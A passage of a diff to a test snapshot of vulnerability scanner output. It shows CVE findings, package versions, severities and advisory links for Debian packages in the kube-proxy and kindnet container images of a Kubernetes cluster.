1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "libtirpc: DoS vulnerability with lots of connections", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "value": "https://avd.aquasec.com/nvd/cve-2021-46828", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", + "value": "https://access.redhat.com/errata/RHSA-2022:8400", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://access.redhat.com/security/cve/CVE-2021-46828", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://bugzilla.redhat.com/2109352", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4942", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", }, { "type": "URL", - "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3997", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3997", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", - "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5226-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3997", - "https://www.openwall.com/lists/oss-security/2022/01/10/2", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3997", + "value": "https://errata.rockylinux.org/RLSA-2022:8400", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3997", + "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "value": "https://security.gentoo.org/glsa/202210-33", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5226-1", + "value": "https://ubuntu.com/security/notices/USN-5538-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", + "value": "https://www.debian.org/security/2022/dsa-5200", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-3821", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ "https://access.redhat.com/errata/RHSA-2023:0336", "https://access.redhat.com/security/cve/CVE-2022-3821", @@ -165718,7 +165439,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "buffer overrun in format_timespan() function", "references": [ @@ -165799,11 +165520,11 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-4415", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ "https://access.redhat.com/errata/RHSA-2023:0954", "https://access.redhat.com/security/cve/CVE-2022-4415", @@ -165826,7 +165547,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ @@ -165908,10 +165629,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2013-4392", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", "http://www.openwall.com/lists/oss-security/2013/10/01/9", @@ -165923,7 +165644,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ @@ -165961,93 +165682,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20386", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", - "https://access.redhat.com/security/cve/CVE-2019-20386", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", - "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", - "https://linux.oracle.com/cve/CVE-2019-20386.html", - "https://linux.oracle.com/errata/ELSA-2020-4553.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", - "https://security.netapp.com/advisory/ntap-20200210-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-20386", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20386", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20386", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", - }, - { - "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2020-13529", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ "http://www.openwall.com/lists/oss-security/2021/08/04/2", "http://www.openwall.com/lists/oss-security/2021/08/17/3", @@ -166068,7 +165706,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ @@ -166142,37 +165780,47 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31437", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "libxtables12", "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", + "name": "iptables: --syn flag bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31437", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, ], "severity": "LOW", @@ -166180,276 +165828,377 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31438", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4899", + "installedVersion": "1.4.8+dfsg-2.1", + "packageName": "libzstd1", "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", + "https://access.redhat.com/security/cve/CVE-2022-4899", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "https://github.com/facebook/zstd/issues/3200", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "https://www.cve.org/CVERecord?id=CVE-2022-4899", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", + "name": "buffer overrun in util.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31438", + "value": "https://avd.aquasec.com/nvd/cve-2022-4899", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://access.redhat.com/security/cve/CVE-2022-4899", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://github.com/facebook/zstd/issues/3200", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31439", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31439", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + }, + { + "type": "URL", + "value": "http://www.securityfocus.com/bid/26048", + }, + { + "type": "URL", + "value": "http://www.vupen.com/english/advisories/2007/3474", + }, + { + "type": "URL", + "value": "https://issues.rpath.com/browse/RPL-1825", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "4.13-3+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46848", - "installedVersion": "4.13-3", - "packageName": "libtasn1-6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0343", - "https://access.redhat.com/security/cve/CVE-2021-46848", - "https://bugs.gentoo.org/866237", - "https://bugzilla.redhat.com/2140058", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", - "https://errata.almalinux.org/9/ALSA-2023-0343.html", - "https://errata.rockylinux.org/RLSA-2023:0343", - "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", - "https://gitlab.com/gnutls/libtasn1/-/issues/32", - "https://linux.oracle.com/cve/CVE-2021-46848.html", - "https://linux.oracle.com/errata/ELSA-2023-0343.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", - "https://security.netapp.com/advisory/ntap-20221118-0006/", - "https://ubuntu.com/security/notices/USN-5707-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", ], }, "category": "Vulnerability", - "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtasn1: Out-of-bound access in ETYPE_OK", + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46848", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0343", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46848", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", + }, + { + "type": "URL", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://bugs.gentoo.org/866237", + "value": "https://github.com/shadow-maint/shadow/issues/317", + }, + { + "type": "URL", + "value": "https://github.com/shadow-maint/shadow/pull/545", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + }, + { + "type": "URL", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202210-26", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5745-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5745-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", + ], + }, + "category": "Vulnerability", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140058", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0343", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": 